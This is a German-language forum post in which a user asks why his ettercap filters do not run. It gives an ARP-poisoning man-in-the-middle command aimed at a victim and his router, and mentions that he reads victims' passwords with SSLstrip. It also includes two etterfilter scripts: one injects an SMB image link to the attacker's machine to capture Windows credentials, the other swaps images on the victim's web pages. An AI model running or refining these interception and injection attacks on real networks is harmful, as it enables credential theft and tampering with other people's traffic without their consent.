Hey Leute,
ich hab mal n bissi mit ettercap rumgespielt und hab vor einiger Zeit auch mal nen "Erfolg" gehabt in hinsicht auf, dass ich einen Filter gefunden hab, der auf einer Homepage die das Opfer aufruft alle Bilder auswechselt.

So nun hab ich heute hier im Forum rumgestöbert und bin dabei auf folgendes Video gestoßen:
http://forums.remote-exploit.org/pen...-backdoor.html

Nun wollte ich das mal ausprobieren und hab mir den Filter besorgt, compiliert und ihn mit ettercap gestartet...
Aber nichts passiert.
Ettercap benutzt die Filter iwie nicht mehr.
Egal ob ich den alten oder den neuen Filter probiere, es passiert garnichts.
Ettercap selbst läuft, denn mit SSLstrip kann ich immernoch die Kennwörter auslesen...
Nur die Filter gehen iwie nicht.
Jemand ne Idee oder nen Lösungsansatz?
ich ruf ettercap wie folgt auf:
Code:
ettercap -i eth0 -f smb.ef - Tq -M arp /IP-Victim/ /IP-Router/
Der Filter sieht wie folgt aus:

Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}

if (ip.proto == TCP && tcp.src == 80) {
   replace("</body>", "<img src=\"\\\\XXX.XXX.X.XX\\image.jpg\"></body>");
   replace("</Body>", "<IMG SRC=\"\\\\XXX.XXX.X.XX\\image.jpg\"></body>");
   msg("Filter Ran.\n");
}
der andere (zum Bilderersetzen) sieht so aus:
Code:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
	  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   replace("IMG SRC=", "img src=\"http://www.irongeek.com/images/jollypwn.png\" ");
   msg("Filter Ran.\n");
}

Aber mal abgesehen davon, dass ein Fehler in den Filtern sein könnte, müsste ettercap doch wenigstens "Filter Ran" schreiben sobald es was zum Replacen findet...
tut es aber nicht!

Soviel erstmal von mir...

Ach so noch ne Frage zum ersten Filter...
Sollte ich ettercap nun irgendwann dazu bewegen diesen Filter auszuführen, muss das Bild auf meinem Rechner tatsächlich vorhanden sein oder reicht es bei dem Angriff, dass das Opfer versucht auf meinen Rechner zuzugreifen??

Gruß hardez